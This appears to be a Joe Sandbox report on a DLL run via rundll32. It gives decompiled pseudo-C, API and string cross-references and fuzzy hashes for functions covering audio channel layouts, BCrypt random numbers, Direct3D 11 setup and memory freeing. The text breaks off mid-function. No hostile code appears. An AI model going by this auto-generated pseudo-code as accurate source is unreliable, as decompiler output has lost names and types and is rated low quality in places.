0x1000d93c
0x1000d982
0x1000d98e
0x1000d98e
0x1000d93a
0x1000d928
0x1000d920
0x1000d4f1
0x1000d4f3
0x1000d8e0
0x00000000
0x1000d4f9
0x1000d4f9
0x1000d4fc
0x1000d501
0x1000d503
0x1000d506
0x1000d527
0x1000d510
0x1000d514
0x1000d58f
0x1000d58f
0x1000d594
0x1000d59d
0x1000d5aa
0x1000d5ae
0x1000d5b1
0x1000d5b6
0x1000d5bb
0x1000d5c5
0x1000d5c7
0x1000d5c9
0x1000d5dc
0x1000d5dc
0x1000d5dc
0x1000d5de
0x1000d8be
0x1000d8c3
0x1000d8cb
0x1000d8ce
0x00000000
0x1000d5e4
0x1000d5e4
0x1000d5e9
0x1000d82c
0x1000d82e
0x1000d834
0x1000d836
0x1000d83f
0x1000d847
0x1000d84a
0x1000d84f
0x1000d84f
0x1000d859
0x00000000
0x00000000
0x00000000
0x00000000
0x1000d5ef
0x1000d5f2
0x1000d720
0x1000d726
0x1000d72e
0x1000d7b9
0x1000d7bb
0x1000d7bf
0x00000000
0x1000d7c5
0x1000d7c5
0x1000d7c9
0x1000d85b
0x1000d85b
0x1000d864
0x1000d86c
0x1000d86f
0x1000d7cf
0x1000d7d4
0x1000d7d6
0x1000d7de
0x1000d7e4
0x1000d7e8
0x1000d7eb
0x1000d7f6
0x1000d7fa
0x00000000
0x00000000
0x00000000
0x00000000
0x1000d7fa
0x1000d7c9
0x1000d5f8
0x1000d5f9
0x1000d68b
0x1000d690
0x1000d694
0x1000d698
0x1000d698
0x1000d69c
0x1000d6a0
0x1000d6a2
0x1000d6a6
0x1000d6bc
0x1000d6bc
0x1000d6c0
0x1000d6c3
0x1000d6c8
0x1000d6ca
0x1000d6ca
0x1000d6d2
0x00000000
0x1000d6d4
0x1000d6d4
0x1000d6d4
0x1000d6d9
0x1000d6b0
0x00000000
0x1000d6db
0x1000d6db
0x1000d6dd
0x1000d6e3
0x1000d879
0x1000d882
0x1000d88a
0x1000d88d
0x1000d892
0x1000d896
0x1000d899
0x00000000
0x1000d89f
0x1000d8a2
0x00000000
0x1000d8a8
0x00000000
0x1000d8a8
0x1000d8a2
0x1000d6e9
0x1000d6ec
0x1000d800
0x1000d800
0x1000d80d
0x1000d811
0x1000d814
0x1000d6f2
0x1000d6f2
0x1000d6f2
0x1000d6fb
0x00000000
0x1000d701
0x1000d701
0x1000d70a
0x1000d712
0x1000d715
0x1000d715
0x1000d6fb
0x1000d6ec
0x1000d6e3
0x1000d6d9
0x00000000
0x1000d6b2
0x1000d6b2
0x1000d6b3
0x1000d8b0
0x1000d8b2
0x1000d8b8
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x1000d5ff
0x1000d601
0x00000000
0x00000000
0x1000d607
0x1000d610
0x1000d614
0x1000d617
0x1000d617
0x1000d5f9
0x1000d5f2
0x1000d5e9
0x1000d620
0x1000d623
0x00000000
0x1000d625
0x1000d625
0x1000d628
0x1000d631
0x1000d634
0x00000000
0x00000000
0x00000000
0x00000000
0x1000d634
0x00000000
0x1000d636
0x1000d63d
0x1000d63e
0x1000d647
0x1000d64b
0x1000d64e
0x1000d653
0x1000d656
0x00000000
0x1000d5d0
0x1000d5d0
0x1000d5d3
0x1000d5d4
0x1000d5dc
0x1000d660
0x1000d662
0x00000000
0x1000d668
0x1000d671
0x1000d675
0x1000d678
0x1000d67d
0x1000d67d
0x1000d596
0x1000d596
0x1000d596
0x1000d8e3
0x1000d8e3
0x1000d8ec
0x1000d8f4
0x1000d8f7
0x1000d8fc
0x1000d8fc
0x1000d516
0x1000d518
0x1000d51b
0x1000d51b
0x1000d521
0x1000d521
0x00000000
0x1000d521
0x00000000
0x1000d514
0x1000d52f
0x1000d537
0x1000d53b
0x1000d541
0x1000d549
0x1000d54c
0x1000d551
0x1000d551
0x1000d551
0x1000d575
0x1000d57c
0x1000d57c
0x1000d4ef
0x00000000

APIs

mv_bprintf.F086 ref: 1000D54C
mv_bprintf.F086 ref: 1000D8F7

Strings

AMBI%d, xrefs: 1000D85F
@%s, xrefs: 1000D642
%d channels, xrefs: 1000D8E7
%d channels (, xrefs: 1000D5A5
NONE, xrefs: 1000D60B
USR%d, xrefs: 1000D808

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_bprintf
String ID: %d channels$%d channels ($@%s$AMBI%d$NONE$USR%d
API String ID: 3083893021-1306170362
Opcode ID: 98ded283bb3ae70f21cce0f44d25f16bdae0512caeeaba98897a65d1631d7c3f
Instruction ID: 96990cf085468aa9ba630c0c0793423886e9eba89b3e303bf26647e4a11a856d
Opcode Fuzzy Hash: 98ded283bb3ae70f21cce0f44d25f16bdae0512caeeaba98897a65d1631d7c3f
Instruction Fuzzy Hash: 8BB1A675A087068BD714EF28C48066EB7E1FF882D0F55892EE989C7345EB31ED44CB92

Uniqueness

Uniqueness Score: -1.00%

Function 10035030 Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 238COMMON

Download Yara Rule

APIs

BCryptOpenAlgorithmProvider.BCRYPT ref: 10035059
BCryptGenRandom.BCRYPT ref: 10035083
BCryptCloseAlgorithmProvider.BCRYPT ref: 1003509A
mvpriv_open.F086 ref: 100350B7
_read.MSVCRT ref: 100350D7
_close.MSVCRT ref: 100350E1
mvpriv_open.F086 ref: 100350FC
_read.MSVCRT ref: 1003511C
_close.MSVCRT ref: 10035126
clock.MSVCRT ref: 10035208

Strings

RNG, xrefs: 1003503A
Microsoft Primitive Provider, xrefs: 10035034
N, xrefs: 10035375

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Crypt$AlgorithmProvider_close_readmvpriv_open$CloseOpenRandomclock
String ID: Microsoft Primitive Provider$N$RNG
API String ID: 4139849330-2077157618
Opcode ID: ba0f5cf16dd16bf2a74f44db4dfaca41cdcaddc0f25a1e0faec0a639bd5545d4
Instruction ID: 55d25eed0a1b74d277015fe739bb6a08acfe9f0c77a35e4a57d9ad1f3d4738c5
Opcode Fuzzy Hash: ba0f5cf16dd16bf2a74f44db4dfaca41cdcaddc0f25a1e0faec0a639bd5545d4
Instruction Fuzzy Hash: E891A075A043508FE304DF78C9C021ABBE2FBC9311F51897EE9889B365EB75D9448B51

Uniqueness

Uniqueness Score: -1.00%

Function 1001F523 Relevance: 30.0, APIs: 10, Strings: 7, Instructions: 273
libraryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 30%

			E1001F523(intOrPtr _a4, intOrPtr _a12) {
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v64;
				intOrPtr _v96;
				signed int _v100;
				char _v320;
				char _v328;
				intOrPtr _v336;
				intOrPtr _v344;
				intOrPtr _v352;
				void* _v356;
				signed int _v360;
				char _v364;
				intOrPtr* _v368;
				intOrPtr _v376;
				intOrPtr _v384;
				signed int _v388;
				char _v392;
				void* _v396;
				intOrPtr _v400;
				intOrPtr* _v404;
				intOrPtr* _v408;
				void* _v412;
				CHAR* _v416;
				signed int _v420;
				char _v424;
				int _v428;
				void* _v452;
				char* _v456;
				intOrPtr _v460;
				char _v464;
				intOrPtr _v468;
				intOrPtr _v472;
				char _v476;
				intOrPtr _v480;
				void* _t93;
				struct HINSTANCE__* _t94;
				intOrPtr _t102;
				void* _t108;
				intOrPtr* _t109;
				char _t110;
				void* _t111;
				intOrPtr* _t112;
				intOrPtr* _t115;
				void* _t116;
				struct HINSTANCE__* _t117;
				_Unknown_base(*)()* _t118;
				void* _t119;
				intOrPtr* _t120;
				intOrPtr* _t122;
				intOrPtr* _t124;
				void* _t127;
				void* _t134;
				int _t136;
				void* _t140;
				intOrPtr* _t142;
				intOrPtr* _t144;
				_Unknown_base(*)()* _t146;
				intOrPtr _t147;
				signed int _t152;
				char _t155;
				intOrPtr _t162;
				intOrPtr _t163;
				intOrPtr _t164;
				intOrPtr _t165;
				intOrPtr* _t169;
				intOrPtr* _t191;
				intOrPtr _t194;
				void* _t195;
				void* _t198;
				void* _t200;
				void* _t201;
				intOrPtr* _t202;
				intOrPtr* _t204;
				intOrPtr* _t205;

				_v328 = 0;
				_t191 =  *((intOrPtr*)(_a4 + 0xc));
				_t93 = E100110D0(_a12, "debug", 0, 0);
				_t94 = LoadLibraryA("d3d11_1sdklayers.dll");
				_t200 = _t198 - 0x178;
				if(_t93 == 0 || _t94 == 0) {
					_t194 = 0x800;
					_v344 = 0;
				} else {
					_t194 = 0x802;
					_v344 = 1;
				}
				_v396 = 0x100d7268;
				_v320 = 0;
				_t152 =  &_v320;
				_v384 = 0;
				_v388 = _t152;
				_v392 = 0;
				__imp__InitOnceBeginInitialize();
				_t201 = _t200 - 0x10;
				if(_v336 != 0) {
					_v356 = L100A7C1C("d3d11.dll", 0, 0);
					_t102 = L100A7C1C("dxgi.dll", 0, 0);
					_t155 = _v356;
					if(_t155 != 0) {
						_v352 = _t102;
						if(_t102 != 0) {
							_v412 = _t155;
							_v408 = "D3D11CreateDevice";
							_v356 = GetProcAddress;
							_t146 = GetProcAddress(??, ??);
							_v416 = "CreateDXGIFactory1";
							_t169 = _v364;
							 *0x100d7260 = _t146;
							_v420 = _v360;
							_t147 =  *_t169(0, 0);
							_push(_t169);
							_push(_t169);
							 *0x100d7264 = _t147;
						}
					}
				}
				_v412 = 0x100d7268;
				_v404 = 0;
				_v408 = 0;
				__imp__InitOnceComplete();
				_t202 = _t201 - 0xc;
				if( *0x100d7260 == 0) {
					L29:
					E10026560(_v24, 0x10, "Failed to load D3D11 library or its functions\n");
					goto L30;
				} else {
					_t109 =  *0x100d7264;
					if(_t109 == 0) {
						goto L29;
					}
					if(_v20 != 0) {
						_v420 = _t152;
						_v424 = 0x100c75a0;
						_t134 =  *_t109();
						_t202 = _t202 - 8;
						if(_t134 >= 0) {
							 *_t202 = _v28;
							_t136 = atoi(??);
							_v424 =  &_v364;
							_v428 = _t136;
							 *_t202 = _v356;
							_t140 =  *((intOrPtr*)( *_v356 + 0x1c))();
							_t205 = _t202 - 0xc;
							if(_t140 < 0) {
								_v376 = 0;
								_t142 = _v368;
								 *_t205 = _t142;
								 *((intOrPtr*)( *_t142 + 8))();
								_t202 = _t205 - 4;
							} else {
								_t144 = _v368;
								 *_t205 = _t144;
								 *((intOrPtr*)( *_t144 + 8))();
								_t202 = _t205 - 4;
							}
						}
					}
					_t110 = _v356;
					if(_t110 != 0) {
						_v420 = _t152;
						_v424 = _t110;
						_t127 =  *((intOrPtr*)( *_t110 + 0x20))();
						_t202 = _t202 - 8;
						if(_t127 >= 0) {
							_v412 = _t152;
							_v416 = _v96;
							_v420 = _v100;
							_v424 = "Using device %04x:%04x (%ls).\n";
							_v428 = 0x20;
							 *_t202 = _v32;
							E10026560();
						}
						_t110 = _v364;
					}
					_v412 = _t194;
					_v388 = 0;
					_v392 = 0;
					_v400 = 7;
					_v404 = 0;
					_v408 = 0;
					_v396 = _t191;
					_v416 = 0;
					_v420 = 0 | _t110 == 0x00000000;
					_v424 = _t110;
					_t111 =  *0x100d7260();
					_t202 = _t202 - 0x28;
					_t195 = _t111;
					_t112 = _v396;
					if(_t112 != 0) {
						_v464 = _t112;
						 *((intOrPtr*)( *_t112 + 8))();
						_t202 = _t202 - 4;
					}
					if(_t195 < 0) {
						E10026560(_v64, 0x10, "Failed to create Direct3D device (%lx)\n", _t195);
						L30:
						_t108 = 0xb1b4b1ab;
						goto L19;
					} else {
						_t115 =  *_t191;
						_v456 =  &_v392;
						_v460 = 0x100c70d0;
						_v464 = _t115;
						_t116 =  *((intOrPtr*)( *_t115))();
						_t202 = _t202 - 0xc;
						if(_t116 >= 0) {
							_t122 = _v404;
							_v472 = 1;
							_v476 = _t122;
							 *((intOrPtr*)( *_t122 + 0x14))();
							_t204 = _t202 - 8;
							_t124 = _v412;
							 *_t204 = _t124;
							 *((intOrPtr*)( *_t124 + 8))();
							_t202 = _t204 - 4;
						}
						if(_v424 != 0) {
							_t117 = LoadLibraryA("dxgidebug.dll");
							_t202 = _t202 - 4;
							if(_t117 != 0) {
								_t118 = GetProcAddress(_t117, "DXGIGetDebugInterface");
								_t202 = _t202 - 8;
								if(_t118 != 0) {
									_v472 = _t152;
									_v400 = 0;
									_v476 = 0x100c7530;
									_t119 =  *_t118();
									_t202 = _t202 - 8;
									if(_t119 >= 0) {
										_t120 = _v408;
										if(_t120 != 0) {
											_v464 = 7;
											_t162 =  *0x100c6e30; // 0xe48ae283
											 *_t202 = _t120;
											_v480 = _t162;
											_t163 =  *0x100c6e34; // 0x490bda80
											_v476 = _t163;
											_t164 =  *0x100c6e38; // 0xe943e687
											_v472 = _t164;
											_t165 =  *0x100c6e3c; // 0x8dacfa9
											_v468 = _t165;
											 *((intOrPtr*)( *_t120 + 0xc))();
											_t202 = _t202 - 0x18;
										}
									}
								}
							}
						}
						_t108 = 0;
						L19:
						return _t108;
					}
				}
			}

0x1001f545
0x1001f550
0x1001f569
0x1001f57d
0x1001f57f
0x1001f584
0x1001f5a2
0x1001f5a7
0x1001f58a
0x1001f58f
0x1001f594
0x1001f594
0x1001f5ab
0x1001f5b6
0x1001f5ba
0x1001f5be
0x1001f5c4
0x1001f5c8
0x1001f5cc
0x1001f5d2
0x1001f5db
0x1001f8b6
0x1001f8bf
0x1001f8c4
0x1001f8ca
0x1001f8d0
0x1001f8d6
0x1001f8dc
0x1001f8e5
0x1001f8ed
0x1001f8f1
0x1001f8f9
0x1001f901
0x1001f905
0x1001f90a
0x1001f90d
0x1001f90f
0x1001f910
0x1001f911
0x1001f911
0x1001f8d6
0x1001f8ca
0x1001f5e1
0x1001f5ea
0x1001f5f0
0x1001f5f4
0x1001f5ff
0x1001f604
0x1001f85a
0x1001f876
0x00000000
0x1001f60a
0x1001f60a
0x1001f611
0x00000000
0x00000000
0x1001f620
0x1001f622
0x1001f626
0x1001f62d
0x1001f62f
0x1001f634
0x1001f7f7
0x1001f7fa
0x1001f80b
0x1001f813
0x1001f817
0x1001f81a
0x1001f81d
0x1001f822
0x1001f842
0x1001f846
0x1001f84c
0x1001f84f
0x1001f852
0x1001f824
0x1001f824
0x1001f82a
0x1001f82d
0x1001f830
0x1001f830
0x1001f822
0x1001f634
0x1001f63a
0x1001f640
0x1001f644
0x1001f648
0x1001f64b
0x1001f64e
0x1001f653
0x1001f7b0
0x1001f7bb
0x1001f7c6
0x1001f7cf
0x1001f7d8
0x1001f7e3
0x1001f7e6
0x1001f7e6
0x1001f659
0x1001f659
0x1001f65d
0x1001f665
0x1001f66e
0x1001f674
0x1001f67a
0x1001f680
0x1001f688
0x1001f68f
0x1001f693
0x1001f697
0x1001f69a
0x1001f6a0
0x1001f6a3
0x1001f6a5
0x1001f6ab
0x1001f6af
0x1001f6b2
0x1001f6b5
0x1001f6b5
0x1001f6ba
0x1001f8a5
0x1001f87b
0x1001f87b
0x00000000
0x1001f6c0
0x1001f6c0
0x1001f6cd
0x1001f6d1
0x1001f6d5
0x1001f6d8
0x1001f6da
0x1001f6df
0x1001f6e1
0x1001f6ec
0x1001f6f0
0x1001f6f3
0x1001f6f6
0x1001f6f9
0x1001f6ff
0x1001f702
0x1001f705
0x1001f705
0x1001f70e
0x1001f727
0x1001f729
0x1001f72e
0x1001f73c
0x1001f742
0x1001f747
0x1001f749
0x1001f74f
0x1001f753
0x1001f75a
0x1001f75c
0x1001f761
0x1001f763
0x1001f769
0x1001f772
0x1001f776
0x1001f77c
0x1001f77f
0x1001f783
0x1001f789
0x1001f78d
0x1001f793
0x1001f797
0x1001f79d
0x1001f7a1
0x1001f7a4
0x1001f7a4
0x1001f769
0x1001f761
0x1001f747
0x1001f72e
0x1001f710
0x1001f712
0x1001f71c
0x1001f71c
0x1001f6ba

APIs

mv_dict_get.F086 ref: 1001F569
LoadLibraryA.KERNEL32 ref: 1001F57D
InitOnceBeginInitialize.KERNEL32 ref: 1001F5CC
InitOnceComplete.KERNEL32 ref: 1001F5F4

Strings

dxgi.dll, xrefs: 1001F8BA
Failed to create Direct3D device (%lx), xrefs: 1001F890
Using device %04x:%04x (%ls)., xrefs: 1001F7CA
Failed to load D3D11 library or its functions, xrefs: 1001F861
DXGIGetDebugInterface, xrefs: 1001F733
debug, xrefs: 1001F534
d3d11.dll, xrefs: 1001F8AC

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: InitOnce$BeginCompleteInitializeLibraryLoadmv_dict_get
String ID: DXGIGetDebugInterface$Failed to create Direct3D device (%lx)$Failed to load D3D11 library or its functions$Using device %04x:%04x (%ls).$d3d11.dll$debug$dxgi.dll
API String ID: 2640887736-2754084114
Opcode ID: 46d71de76901be22f43a985af2c852e585d150c4c55c8bf33d4014df43fd258f
Instruction ID: b26665e88cdb3ff3bd93bc6ff27e16a968a577adae798b8ccfa67922602f4651
Opcode Fuzzy Hash: 46d71de76901be22f43a985af2c852e585d150c4c55c8bf33d4014df43fd258f
Instruction Fuzzy Hash: 4EB1E4B4A087419FD354EF69D58462ABBF1FF89740F41892EE989CB354EB34D884CB42

Uniqueness

Uniqueness Score: -1.00%

Function 100132D0 Relevance: 28.6, APIs: 19, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E100132D0() {
				void* _t43;
				intOrPtr _t61;
				intOrPtr _t63;
				intOrPtr _t65;
				intOrPtr _t67;
				signed int _t72;
				signed int _t73;
				signed int _t74;
				signed int _t75;
				intOrPtr* _t78;
				intOrPtr* _t84;
				intOrPtr* _t87;
				intOrPtr* _t93;
				void* _t94;
				intOrPtr* _t95;

				_t95 = _t94 - 0x2c;
				_t87 =  *((intOrPtr*)(_t95 + 0x40));
				if(_t87 != 0) {
					if( *((intOrPtr*)(_t87 + 0xc)) == 0) {
						L4:
						_t84 =  *((intOrPtr*)(_t87 + 0x1c));
						if(_t84 == 0) {
							L21:
							 *_t95 =  *_t87;
							L23();
							 *_t95 =  *((intOrPtr*)(_t87 + 8));
							L23();
							 *_t95 =  *((intOrPtr*)(_t87 + 0x14));
							L23();
							 *((intOrPtr*)(_t95 + 0x40)) = _t87;
							return __imp___aligned_free();
						}
						if( *((intOrPtr*)(_t84 + 0xc)) == 0) {
							L8:
							_t93 =  *((intOrPtr*)(_t84 + 0x1c));
							if(_t93 == 0) {
								L20:
								 *_t95 =  *_t84;
								L23();
								 *_t95 =  *((intOrPtr*)(_t84 + 8));
								L23();
								 *_t95 =  *((intOrPtr*)(_t84 + 0x14));
								L23();
								 *_t95 = _t84;
								L23();
								goto L21;
							}
							if( *((intOrPtr*)(_t93 + 0xc)) == 0) {
								L12:
								_t78 =  *((intOrPtr*)(_t93 + 0x1c));
								if(_t78 == 0) {
									L19:
									 *_t95 =  *_t93;
									L23();
									 *_t95 =  *((intOrPtr*)(_t93 + 8));
									L23();
									 *_t95 =  *((intOrPtr*)(_t93 + 0x14));
									L23();
									 *_t95 = _t93;
									L23();
									goto L20;
								}
								if( *((intOrPtr*)(_t78 + 0xc)) == 0) {
									L16:
									_t55 =  *((intOrPtr*)(_t78 + 0x1c));
									if( *((intOrPtr*)(_t78 + 0x1c)) != 0) {
										 *((intOrPtr*)(_t95 + 0x1c)) = _t78;
										L10012850(_t55);
										_t78 =  *((intOrPtr*)(_t95 + 0x1c));
									}
									 *((intOrPtr*)(_t95 + 0x1c)) = _t78;
									 *_t95 =  *_t78;
									L23();
									 *_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t95 + 0x1c)) + 8));
									L23();
									 *_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t95 + 0x1c)) + 0x14));
									L23();
									 *_t95 =  *((intOrPtr*)(_t95 + 0x1c));
									L23();
									goto L19;
								}
								_t72 = 0;
								do {
									 *((intOrPtr*)(_t95 + 0x1c)) = _t78;
									_t61 =  *((intOrPtr*)( *((intOrPtr*)(_t78 + 8)) + _t72 * 4));
									_t72 = _t72 + 1;
									 *_t95 = _t61;
									L23();
									_t78 =  *((intOrPtr*)(_t95 + 0x1c));
								} while (_t72 <  *((intOrPtr*)(_t78 + 0xc)));
								goto L16;
							}
							_t73 = 0;
							do {
								_t63 =  *((intOrPtr*)( *((intOrPtr*)(_t93 + 8)) + _t73 * 4));
								_t73 = _t73 + 1;
								 *_t95 = _t63;
								L23();
							} while (_t73 <  *((intOrPtr*)(_t93 + 0xc)));
							goto L12;
						}
						_t74 = 0;
						do {
							_t65 =  *((intOrPtr*)( *((intOrPtr*)(_t84 + 8)) + _t74 * 4));
							_t74 = _t74 + 1;
							 *_t95 = _t65;
							L23();
						} while (_t74 <  *((intOrPtr*)(_t84 + 0xc)));
						goto L8;
					}
					_t75 = 0;
					do {
						_t67 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 8)) + _t75 * 4));
						_t75 = _t75 + 1;
						 *_t95 = _t67;
						L23();
					} while (_t75 <  *((intOrPtr*)(_t87 + 0xc)));
					goto L4;
				}
				return _t43;
			}

0x100132d4
0x100132d7
0x100132dd
0x100132e8
0x10013304
0x10013304
0x10013309
0x10013439
0x1001343b
0x1001343e
0x10013446
0x10013449
0x10013451
0x10013454
0x10013459
0x100290d0
0x100290d0
0x10013314
0x10013334
0x10013334
0x10013339
0x10013411
0x10013413
0x10013416
0x1001341e
0x10013421
0x10013429
0x1001342c
0x10013431
0x10013434
0x00000000
0x10013434
0x10013344
0x10013364
0x10013364
0x10013369
0x100133e8
0x100133eb
0x100133ee
0x100133f6
0x100133f9
0x10013401
0x10013404
0x10013409
0x1001340c
0x00000000
0x1001340c
0x10013370
0x1001339c
0x1001339c
0x100133a1
0x100133a3
0x100133a7
0x100133ac
0x100133ac
0x100133b0
0x100133b6
0x100133b9
0x100133c5
0x100133c8
0x100133d4
0x100133d7
0x100133e0
0x100133e3
0x00000000
0x100133e3
0x10013372
0x10013380
0x10013380
0x10013387
0x1001338a
0x1001338b
0x1001338e
0x10013393
0x10013397
0x00000000
0x10013380
0x10013346
0x10013350
0x10013353
0x10013356
0x10013357
0x1001335a
0x1001335f
0x00000000
0x10013350
0x10013316
0x10013320
0x10013323
0x10013326
0x10013327
0x1001332a
0x1001332f
0x00000000
0x10013320
0x100132ea
0x100132f0
0x100132f3
0x100132f6
0x100132f7
0x100132fa
0x100132ff
0x00000000
0x100132f0
0x10013477

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 196854d94c2d3dadbfed7b001a059d3303f2942ada5cc75a7543bfd3e5186445
Instruction ID: aab0cb6abdf460125275c6e5ebe0c2fb3ff18ba6de562b5529d80b352c1cac01
Opcode Fuzzy Hash: 196854d94c2d3dadbfed7b001a059d3303f2942ada5cc75a7543bfd3e5186445
Instruction Fuzzy Hash: 14519F79A047098FCB50EFA9D0C5A5AF7F0FF44250F41892DE8998B301DA71F985CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1002334C Relevance: 23.4, APIs: 11, Strings: 2, Instructions: 635
COMMONCrypto

Download Yara Rule

C-Code - Quality: 35%

			E1002334C(signed int __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				unsigned int _t304;
				char* _t305;
				signed int _t314;
				signed int _t316;
				signed int _t325;
				signed int _t330;
				signed int _t331;
				signed int _t332;
				int _t335;
				signed int _t336;
				signed int _t338;
				signed int _t342;
				signed int _t344;
				signed int _t347;
				signed int _t348;
				signed char* _t350;
				signed int _t351;
				int _t352;
				signed int _t354;
				int _t355;
				signed int _t356;
				signed int _t358;
				int _t361;
				signed int _t362;
				void _t364;
				signed int _t365;
				signed int _t367;
				signed int _t369;
				signed int _t372;
				intOrPtr _t379;
				intOrPtr _t380;
				intOrPtr _t381;
				intOrPtr _t382;
				intOrPtr _t383;
				intOrPtr _t384;
				signed int _t386;
				signed int _t388;
				char* _t389;
				signed int _t393;
				signed char _t398;
				void* _t399;
				char* _t405;
				char _t406;
				char* _t408;
				signed int _t409;
				signed char _t411;
				signed int _t413;
				signed int _t414;
				signed int _t417;
				signed int _t418;
				signed short _t425;
				void* _t429;
				char* _t430;
				unsigned int _t434;
				signed int _t435;
				signed int _t437;
				signed char _t439;
				signed char* _t440;
				unsigned int _t441;
				signed int _t442;
				int _t444;
				signed char _t449;
				void* _t450;
				signed int _t453;
				signed int _t454;
				intOrPtr _t455;
				signed char _t456;
				signed char _t457;
				int _t458;
				char* _t463;
				char* _t464;
				signed int _t465;
				signed int _t467;
				signed int _t471;
				signed int _t474;
				signed int _t475;
				signed int _t477;
				signed int _t479;
				signed int* _t484;
				signed int _t489;
				signed int _t494;
				void _t495;
				char* _t496;
				signed int _t498;
				void* _t499;
				signed int _t501;
				void* _t502;
				void* _t503;
				signed int _t507;
				intOrPtr _t508;
				intOrPtr _t509;
				void* _t514;
				signed int _t517;
				char* _t519;
				signed int _t526;
				signed int _t528;
				int _t533;
				signed int _t534;
				void* _t537;
				signed int* _t538;
				signed int _t539;
				char* _t540;
				void* _t541;
				unsigned int _t543;
				unsigned int _t544;
				signed int _t545;
				signed int _t547;
				signed int _t548;
				signed int _t549;
				signed int _t550;
				signed int _t552;
				int _t553;
				void* _t554;
				char** _t555;
				signed int* _t557;
				void* _t571;

				_t465 = __edx;
				_t555 = _t554 - 0x6c;
				_t408 = _t555[0x24];
				_t519 = _t555[0x22];
				_t555[3] = _t555[0x27];
				 *_t555 = _t408;
				_t555[2] = _t555[0x26];
				_t555[1] = _t555[0x25];
				_t304 = E10023180(__edx, __eflags);
				 *_t555 = _t408;
				_t543 = _t304;
				_t305 = L10034790();
				_t555[0x12] = _t305;
				_t430 = _t305;
				if((_t543 >> 0x0000001f | _t465 & 0xffffff00 | _t543 - _t555[0x21] > 0x00000000) != 0 || _t430 == 0) {
					_t544 = 0xffffffea;
					goto L28;
				} else {
					_t467 = _t430[4] & 0x000000ff;
					if(_t467 == 0) {
						_t496 = 0;
						_t555[0xf] = 0;
					} else {
						_t463 =  >=  ? _t430[0x10] : 0;
